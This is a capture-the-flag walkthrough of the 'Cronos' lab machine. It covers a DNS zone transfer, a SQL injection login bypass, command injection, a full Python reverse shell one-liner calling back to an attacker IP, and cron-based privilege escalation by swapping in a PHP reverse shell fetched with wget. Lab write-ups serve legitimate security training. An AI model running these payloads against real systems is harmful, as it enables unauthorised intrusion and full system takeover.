Cronos

DNS Enumeration - Command Injection - CronJob PrivEsc

Scanning

HTTP Enumeration

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.13

DNS Enumeration

dig axfr cronos.htb @10.10.10.13
cronos.htb
admin.cronos.htb
ns1.cronos.htb

Visiting the admin subdomain !

admin/admin - Din't work
admin/pass - Din't work
administrator/password123 - Din't work

Finally tried SQLi and it worked !

admin' or 1=1 #

Possibly we can try OS Command Injection !

8.8.8.8 & whoami

Confirming it is vulnerable to command injection, we can now insert a reverse shell and get a connection back :)

Unfortunately, it doesn't send us a reverse shell back, let's try with python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we get a hit :)

Privilege Escalation

Checking the crontab

Viewing the permission of the file - /var/www/laravel/artisan

We don't have -w- permissions :(

But what we can do is, we can remove the existing file and transfer our php-reverse shell to this location and rename it as artisan :)

rm -rf artisan
wget http://10.10.14.4/php-reverse-shell.php -o artisan

PreviousBeep NextNineveh

Last updated 1 year ago